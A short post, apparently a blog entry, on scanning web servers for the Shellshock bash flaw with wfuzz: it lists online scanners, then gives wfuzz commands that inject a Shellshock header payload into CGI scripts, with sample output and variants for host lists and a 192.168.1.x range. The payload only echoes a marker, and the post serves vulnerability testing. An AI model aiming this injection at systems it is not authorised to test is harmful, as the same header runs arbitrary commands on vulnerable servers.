Scan for shellshock with wfuzz

In the last few weeks everyone has been talking about Shellshock, the vulnerability affecting bash and having security ramifications everywhere, from Web, DHCP or SSH servers to mail servers. It does not have any sense to extend this post trying to rehash what this vulnerability is about or why it is an issue, as by now there are thousands of other posts and articles about the Bash “Shellshock” vulnerability, you only have to do a quick search on the Internet.

The best way to test for the Shellshock vulnerability is to do a local check but if you are worried about your web server hosting a vulnerable /cgi-bin and you don’t have shell access, there are plenty of free Shellshock on-line scanner tools such as:

• http://shellshock.brandonpotter.com/
• http://bashsmash.ccsir.org/
• http://www.shellshocktest.com/
• …

Or tools like Qualys, Nessus, Nmap, Burp, Metasploit… and a bunch of “quick-and-dirty” scans using simple Perl or Python scripts.

Of course, you can also use Wfuzz to check for internal or external affected Web servers easily, by injecting a payload in the User-agent, Referer or Accept headers against well known CGI scripts as follows (since v2.1 — ss switch allows you to filter responses containing the specified regex):

$ wfuzz.py -H “User-Agent: () { :;}; echo; echo vulnerable” — ss vulnerable -w cgis.txt http://localhost:8000/FUZZ
****************************************
* Wfuzz 2.1 — The Web Bruteforcer *
****************************************

Target: http://localhost:8000/FUZZ
Total requests: 389

==============================================
ID Response Lines Word Chars Request
==============================================

00250: C=200 4 L 6 W 50 Ch “/cgi-bin/test.cgi”

Total time: 0.725533
Processed Requests: 389
Filtered Requests: 388
Requests/sec.: 536.1568

You can also scan various hosts by supplying a list of hostnames, for example:

$ wfuzz.py -H “User-Agent: () { :;}; echo; echo vulnerable” — ss vulnerable -w hostslist.txt -w cgis.txt FUZZ/FUZ2Z

or by using an IP range (v2.1 allows you to use the -Z switch to ignore connection errors):

$ wfuzz.py -H “User-Agent: () { :;}; echo; echo vulnerable” — ss vulnerable -z range,0–255 -w cgis.txt -Z http://192.168.1.FUZZ/FUZ2Z

Happy hunting,